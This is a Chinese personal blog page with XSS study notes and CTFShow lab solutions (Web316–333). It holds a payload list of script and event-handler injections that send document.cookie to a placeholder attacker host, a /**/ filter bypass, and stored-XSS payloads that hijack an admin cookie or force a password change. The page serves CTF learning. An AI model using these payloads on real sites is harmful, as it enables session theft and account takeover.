<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="XSS基础总结       虽然理解的还不是很透彻，但还是写一点吧">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS基础">
<meta property="og:url" content="http://yan5ui.github.io/2023/06/30/XSS%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="yansui&#39;s blogs">
<meta property="og:description" content="XSS基础总结       虽然理解的还不是很透彻，但还是写一点吧">
<meta property="og:locale">
<meta property="og:image" content="http://yan5ui.github.io/XSS2.png">
<meta property="og:image" content="http://yan5ui.github.io/XSS1.png">
<meta property="article:published_time" content="2023-06-30T12:17:03.320Z">
<meta property="article:modified_time" content="2023-07-01T08:40:25.397Z">
<meta property="article:author" content="yansui">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yan5ui.github.io/XSS2.png"><title>XSS基础 | yansui's blogs</title><link ref="canonical" href="http://yan5ui.github.io/2023/06/30/XSS%E6%80%BB%E7%BB%93/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copiar","copySuccess":"Éxito en copia","copyError":"Error en copia"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Inicio</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">yansui的小窝</div><div class="header-banner-info__subtitle">一个成长中的ctfer</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">XSS基础</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Creado</span><span class="post-meta-item__value">2023-06-30</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Actualizado</span><span class="post-meta-item__value">2023-07-01</span></span></div></header><div class="post-body">
        <h1 id="XSS基础总结"   >
          <a href="#XSS基础总结" class="heading-link"><i class="fas fa-link"></i></a><a href="#XSS基础总结" class="headerlink" title="XSS基础总结"></a>XSS基础总结</h1>
      <p>虽然理解的还不是很透彻，但还是写一点吧</p>
<span id="more"></span>

        <h2 id="一、HTML前置基础"   >
          <a href="#一、HTML前置基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#一、HTML前置基础" class="headerlink" title="一、HTML前置基础"></a>一、HTML前置基础</h2>
      <p>下面是有关XSS漏洞的HTML基础，部分内容直接给出链接。</p>

        <h3 id="1-0-HTML简介"   >
          <a href="#1-0-HTML简介" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-0-HTML简介" class="headerlink" title="1.0 HTML简介"></a>1.0 HTML简介</h3>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-intro.html" >HTML简介,注意结合实例理解</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="1-1-HTML页面构成"   >
          <a href="#1-1-HTML页面构成" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-1-HTML页面构成" class="headerlink" title="1.1 HTML页面构成"></a>1.1 HTML页面构成</h3>
      <p>1.<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-intro.html" >HTML标签</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<blockquote>
<p>HTML 标记标签通常被称为 HTML 标签 (HTML tag)。<br>HTML 标签是由尖括号包围的关键词，比如 &lt;html&gt;<br>HTML 标签通常是成对出现的，比如 &lt;b&gt; 和 &lt;&#x2F;b&gt;<br>标签对中的第一个标签是开始标签，第二个标签是结束标签<br>开始和结束标签也被称为开放标签和闭合标签</p>
</blockquote>
<p>2.<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-intro.html" >HTML元素</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<blockquote>
<p>“HTML 标签” 和 “HTML 元素” 通常都是描述同样的意思.<br>但是严格来讲, 一个 HTML 元素包含了开始标签与结束标签，如下实例:<br>HTML 元素:<br>&lt;p&gt;这是一个段落。&lt;&#x2F;p&gt;</p>
</blockquote>
<p>3.<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-attributes.html" >HTML元素的属性</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<blockquote>
<p>HTML 元素可以设置属性<br>属性可以在元素中添加附加信息<br>属性一般描述于开始标签<br>属性总是以名称&#x2F;值对的形式出现，比如：name&#x3D;”value”。<br>属性实例<br>HTML 链接由 &lt;a&gt; 标签定义。链接的地址在 href 属性中指定：<br>实例<br>&lt;a href&#x3D;”<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://www.runoob.com" >这是一个链接\">http://www.runoob.com&quot;&gt;这是一个链接\</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></a></p>
</blockquote>

        <h3 id="1-2-常用的一些HTML元素"   >
          <a href="#1-2-常用的一些HTML元素" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-2-常用的一些HTML元素" class="headerlink" title="1.2 常用的一些HTML元素"></a>1.2 常用的一些HTML元素</h3>
      <p>1.链接<br>最常见的就是一个简单的链接</p>
<blockquote>
<p>&lt;a href&#x3D;”url”&gt;链接文本&lt;&#x2F;a&gt;</p>
</blockquote>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-links.html" >相关资料</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span><br>2.表单<br>表单完成用户输入的内容向服务器端的传递<br>典型的例子：</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">name</span>=<span class="string">&quot;input&quot;</span> <span class="attr">action</span>=<span class="string">&quot;html_form_action.php&quot;</span> <span class="attr">method</span>=<span class="string">&quot;get&quot;</span>&gt;</span></span><br><span class="line">Username: <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;user&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>表示用户点击Submit按钮后将user参数通过get方式发送到服务器端的html_form_action.php</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-forms.html" >相关资料</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span><br>3.框架、表格、列表、图像、列表、背景<br><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/html/html-tutorial.html" >有兴趣就点我去看看</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="二、JavaScript前置基础"   >
          <a href="#二、JavaScript前置基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#二、JavaScript前置基础" class="headerlink" title="二、JavaScript前置基础"></a>二、JavaScript前置基础</h2>
      
        <h3 id="2-0-JavaScript简介"   >
          <a href="#2-0-JavaScript简介" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-0-JavaScript简介" class="headerlink" title="2.0 JavaScript简介"></a>2.0 JavaScript简介</h3>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/js/js-intro.html" >参考链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="2-1-JavaScript语法基础"   >
          <a href="#2-1-JavaScript语法基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-1-JavaScript语法基础" class="headerlink" title="2.1 JavaScript语法基础"></a>2.1 JavaScript语法基础</h3>
      <p>简要了解即可。<br><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/js/js-syntax.html" >参考链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="2-2-DOM"   >
          <a href="#2-2-DOM" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-2-DOM" class="headerlink" title="2.2 DOM"></a>2.2 DOM</h3>
      <p>DOM，即当网页被加载时，浏览器创建页面的文档对象模型（Document Object Model）。<br>将其理解为当前的HTML文件即可，它有一大堆的方法和属性，暂时都不用管。</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/js/js-htmldom.html" >有兴趣可以看看</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="2-3-window对象"   >
          <a href="#2-3-window对象" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-3-window对象" class="headerlink" title="2.3 window对象"></a>2.3 window对象</h3>
      <p>1.open方法</p>
<blockquote>
<p>JavaScript中的window.open()方法用于打开一个新的浏览器窗口或标签页，并加载指定的URL或文件。<br>window.open()方法接受一些参数来指定新窗口的属性，包括URL、窗口名称、窗口尺寸、窗口位置等。常用的参数如下：<br>URL：要在新窗口中加载的网页地址。可以是绝对URL或相对URL。<br>窗口名称：指定新窗口的名称，如果指定相同名称的窗口已存在，则在该窗口中加载URL。如果名称为空或未指定，则会打开一个新的匿名窗口。<br>窗口尺寸：可以通过指定宽度和高度的参数来控制新窗口的大小。例如，window.open(‘<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://example.com/" >http://example.com</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>‘, ‘_blank’, ‘width&#x3D;500,height&#x3D;400’)。<br>窗口位置：可以通过指定左边距和上边距的参数来控制新窗口的位置。例如，window.open(‘<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://example.com/" >http://example.com</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>‘, ‘_blank’, ‘left&#x3D;100,top&#x3D;100’)。<br>window.open()方法返回一个代表新打开窗口的Window对象，您可以使用该对象引用对新窗口进行操作，例如在新窗口中加载页面、修改新窗口的属性、向新窗口发送数据等。</p>
</blockquote>
<p>2.location对象</p>
<p>window.location 对象用于获得当前页面的地址 (URL)，若指定window.location.href可以将浏览器重定向到新的页面。暂时了解这么多即可。</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/js/js-window-location.html" >参考链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>3.alert方法</p>
<p>alert方法用于从浏览器的当前页面弹出一个窗口，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/js/js-popup.html" >请参考</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="三、XSS漏洞原理"   >
          <a href="#三、XSS漏洞原理" class="heading-link"><i class="fas fa-link"></i></a><a href="#三、XSS漏洞原理" class="headerlink" title="三、XSS漏洞原理"></a>三、XSS漏洞原理</h2>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44857938/article/details/118034947" >懒得写了</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="四、Payloads-for-XSS"   >
          <a href="#四、Payloads-for-XSS" class="heading-link"><i class="fas fa-link"></i></a><a href="#四、Payloads-for-XSS" class="headerlink" title="四、Payloads for XSS"></a>四、Payloads for XSS</h2>
      <p>下面是针对XSS一些常用的payload:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">window</span>.<span class="title function_">open</span>(<span class="string">&#x27;http://你的公网ip:端口号/&#x27;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="keyword">var</span> img = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;img&quot;</span>);img.<span class="property">src</span> = <span class="string">&quot;http://你的公网ip:端口号/?cookie=&quot;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span>;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">&#x27;http://你的公网ip:端口号/&#x27;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">location.<span class="property">href</span>=<span class="string">&#x27;http://你的公网ip:端口号/&#x27;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">onfocus</span>=<span class="string">&quot;window.open(&#x27;http://你的公网ip:端口号/&#x27;+document.cookie)&quot;</span> <span class="attr">autofocus</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的公网ip:端口号/&#x27;+document.cookie)&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的公网ip:端口号/&#x27;+document.cookie)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的ceye地址/&#x27;+document.cookie)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>过滤空格可以用&#x2F;* *&#x2F;代替</p>

        <h2 id="五、About-ajax"   >
          <a href="#五、About-ajax" class="heading-link"><i class="fas fa-link"></i></a><a href="#五、About-ajax" class="headerlink" title="五、About ajax"></a>五、About ajax</h2>
      <blockquote>
<p>AJAX &#x3D; 异步 JavaScript 和 XML。<br>AJAX 是一种用于创建快速动态网页的技术。<br>通过在后台与服务器进行少量数据交换，AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下，对网页的某部分进行更新。<br>传统的网页（不使用 AJAX）如果需要更新内容，必需重载整个网页面。</p>
</blockquote>
<p><img src="/XSS2.png"></p>

        <h2 id="六、CTFShow题解"   >
          <a href="#六、CTFShow题解" class="heading-link"><i class="fas fa-link"></i></a><a href="#六、CTFShow题解" class="headerlink" title="六、CTFShow题解"></a>六、CTFShow题解</h2>
      
        <h3 id="Web316"   >
          <a href="#Web316" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web316" class="headerlink" title="Web316"></a>Web316</h3>
      <p>先vpn开nc监听，然后直接</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">window</span>.<span class="title function_">open</span>(<span class="string">&#x27;http://你的公网ip:端口号/&#x27;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>就能收到flag</p>

        <h3 id="Web317"   >
          <a href="#Web317" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web317" class="headerlink" title="Web317"></a>Web317</h3>
      <p>过滤了script<br>payload:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的ceye地址/&#x27;+document.cookie)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web318"   >
          <a href="#Web318" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web318" class="headerlink" title="Web318"></a>Web318</h3>
      <p>payload:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的公网ip:端口号/&#x27;+document.cookie)&quot;</span>&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web319"   >
          <a href="#Web319" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web319" class="headerlink" title="Web319"></a>Web319</h3>
      <figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&quot;window.open(&#x27;http://你的公网ip:端口号/&#x27;+document.cookie)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web320"   >
          <a href="#Web320" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web320" class="headerlink" title="Web320"></a>Web320</h3>
      <p>过滤了空格，用&#x2F;**&#x2F;代替就行</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body/**/onload=&quot;window.open(&#x27;http://你的ceye地址/&#x27;+document.cookie)&quot;&gt;<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web321"   >
          <a href="#Web321" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web321" class="headerlink" title="Web321"></a>Web321</h3>
      <p>payload:<br><code>&lt;svg/**/onload=&quot;window.open(&#39;http://你的公网ip:端口号/&#39;+document.cookie)&quot;&gt;</code></p>

        <h3 id="Web322"   >
          <a href="#Web322" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web322" class="headerlink" title="Web322"></a>Web322</h3>
      <p>上一题的payload照样能打</p>

        <h3 id="Web323"   >
          <a href="#Web323" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web323" class="headerlink" title="Web323"></a>Web323</h3>
      <p>上上题的payload照样能打</p>

        <h3 id="Web324"   >
          <a href="#Web324" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web324" class="headerlink" title="Web324"></a>Web324</h3>
      <p>上上上题的payload照样能打</p>

        <h3 id="Web325"   >
          <a href="#Web325" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web325" class="headerlink" title="Web325"></a>Web325</h3>
      <p>上上上上题的payload照样能打</p>

        <h3 id="Web326"   >
          <a href="#Web326" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web326" class="headerlink" title="Web326"></a>Web326</h3>
      <p>上上上上上题的payload照样能打<br>一把梭了</p>

        <h3 id="Web327"   >
          <a href="#Web327" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web327" class="headerlink" title="Web327"></a>Web327</h3>
      <p>开始储存型XSS 一把梭不了了（悲）</p>
<p>不对 上上上上上上题的payload照样能打</p>

        <h3 id="Web328"   >
          <a href="#Web328" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web328" class="headerlink" title="Web328"></a>Web328</h3>
      <p>题目形式多样啊<br>但是还是直接盗取管理员cookie，注册一个账号，账号名是上面的XSS payload，然后登录即可。在查看所有账号信息事会加载这条账号，从而恶意执行js代码完成XSS。</p>
<p>需要注意的是使用cookie伪造身份需要在chrome浏览器的application界面改变，只在hackbar里边改动是不会生效的。<br><img src="/XSS1.png"></p>

        <h3 id="Web329"   >
          <a href="#Web329" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web329" class="headerlink" title="Web329"></a>Web329</h3>
      <p>跟上面的题目一样</p>

        <h3 id="Web330"   >
          <a href="#Web330" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web330" class="headerlink" title="Web330"></a>Web330</h3>
      <p>直接修改密码（有点像SSRF?）</p>
<p>payload:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">&quot;http://127.0.0.1/api/change.php?p=3&quot;</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>改完直接admin:3登录就行</p>

        <h3 id="Web331"   >
          <a href="#Web331" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web331" class="headerlink" title="Web331"></a>Web331</h3>
      <p>感觉332好好玩 先去玩332</p>
<p>好像要学一个叫ajax的东西 学不了一点 打游戏去了 明天再学</p>
<p>href默认的传输方式是GET，这里的意思就是需要使用POST方式完成修改密码的XSS。</p>
<p>payload:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">$.<span class="title function_">ajax</span>(&#123;<span class="attr">url</span>:<span class="string">&#x27;api/change.php&#x27;</span>,<span class="attr">type</span>:<span class="string">&#x27;post&#x27;</span>,<span class="attr">data</span>:&#123;<span class="attr">p</span>:<span class="number">123</span>&#125;&#125;);</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>这里只需要知道$.ajax()是一个函数即可。</p>

        <h3 id="Web332"   >
          <a href="#Web332" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web332" class="headerlink" title="Web332"></a>Web332</h3>
      <p>感觉更像是教你怎么用brupsuite的题目…..<br>给自己转账只会给自己加钱，不扣钱</p>
<p>直接BrupSuite抓包重放就行</p>

        <h3 id="Web333"   >
          <a href="#Web333" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web333" class="headerlink" title="Web333"></a>Web333</h3>
      <p>这题好像也得ajax 明天再学</p>
<p>最后一道！！<br>注册用户名为&lt;script&gt;1&lt;&#x2F;script&gt;就可以转账了。<br>和上一道题目一样，给自己疯狂转账就行。</p>
<p>XSS告一段落啦，还是去看看js比较好，实在是太菜了</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ FIN ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Autor: </span><span class="copyright-author__value"><a href="http://yan5ui.github.io">yansui</a></span></div><div class="copyright-link"><span class="copyright-link__name">Enlace: </span><span class="copyright-link__value"><a href="http://yan5ui.github.io/2023/06/30/XSS%E6%80%BB%E7%BB%93/">http://yan5ui.github.io/2023/06/30/XSS%E6%80%BB%E7%BB%93/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">Todos los artículos de este blog están bajo licencia  de <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> a menos que se indique lo contrario</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/07/08/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">PHP反序列化总结</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/06/29/SQLi%E6%80%BB%E7%BB%93/"><span class="paginator-prev__text">SQL注入总结</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><section class="sidebar-toc hide"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E5%9F%BA%E7%A1%80%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">
          XSS基础总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81HTML%E5%89%8D%E7%BD%AE%E5%9F%BA%E7%A1%80"><span class="toc-number">1.1.</span> <span class="toc-text">
          一、HTML前置基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-0-HTML%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.1.</span> <span class="toc-text">
          1.0 HTML简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-1-HTML%E9%A1%B5%E9%9D%A2%E6%9E%84%E6%88%90"><span class="toc-number">1.1.2.</span> <span class="toc-text">
          1.1 HTML页面构成</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-2-%E5%B8%B8%E7%94%A8%E7%9A%84%E4%B8%80%E4%BA%9BHTML%E5%85%83%E7%B4%A0"><span class="toc-number">1.1.3.</span> <span class="toc-text">
          1.2 常用的一些HTML元素</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81JavaScript%E5%89%8D%E7%BD%AE%E5%9F%BA%E7%A1%80"><span class="toc-number">1.2.</span> <span class="toc-text">
          二、JavaScript前置基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-0-JavaScript%E7%AE%80%E4%BB%8B"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          2.0 JavaScript简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-JavaScript%E8%AF%AD%E6%B3%95%E5%9F%BA%E7%A1%80"><span class="toc-number">1.2.2.</span> <span class="toc-text">
          2.1 JavaScript语法基础</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-DOM"><span class="toc-number">1.2.3.</span> <span class="toc-text">
          2.2 DOM</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-window%E5%AF%B9%E8%B1%A1"><span class="toc-number">1.2.4.</span> <span class="toc-text">
          2.3 window对象</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81XSS%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">1.3.</span> <span class="toc-text">
          三、XSS漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81Payloads-for-XSS"><span class="toc-number">1.4.</span> <span class="toc-text">
          四、Payloads for XSS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81About-ajax"><span class="toc-number">1.5.</span> <span class="toc-text">
